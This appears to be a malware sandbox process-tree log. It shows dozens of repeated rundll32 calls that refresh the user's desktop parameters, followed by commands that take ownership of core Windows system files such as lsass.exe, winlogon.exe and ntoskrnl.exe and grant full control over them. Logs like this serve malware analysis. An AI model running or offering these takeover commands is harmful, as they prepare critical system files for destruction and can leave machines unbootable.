C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1288
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2996
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2908
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:320
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3040
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1708
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2808
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2592
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1700
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1580
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2432
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2716
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3064
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2876
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2704
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2516
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2404
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2420
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2952
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:960
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:588
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2448
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1672
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1228
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1168
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:540
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:928
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1644
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:932
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1552
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1256
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2984
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1148
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2064
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2004
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1000
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1784
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1792
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2812
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:748
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2748
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:864
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2104
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2192
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1924
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:488
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2436
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2488
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2468
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2524
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2156
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1852
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1584
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2968
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2032
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2172
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2408
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2260
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2720
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:476
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2284
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1732
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2208
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2980
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1984
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2528
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1336
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2772
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1944
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2604
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2084
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2372
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2400
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:536
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2424
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:756
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2792
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1348
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1512
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1812
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3004
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵PID:668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\smss.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵PID:1660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\csrss.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵PID:2076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\wininit.exe /grant "Admin:F"3⤵PID:860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵PID:2264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵PID:1476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\lsass.exe /grant "Admin:F"3⤵PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵PID:2124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\services.exe /grant "Admin:F"3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:1504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winlogon.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:2660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.efi /grant "Admin:F"3⤵
- Modifies file permissions
PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:2344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.exe /grant "Admin:F"3⤵PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2624
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"3⤵
- Modifies file permissions
PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\svchost.exe /grant "Admin:F"3⤵PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit2⤵PID:644
-
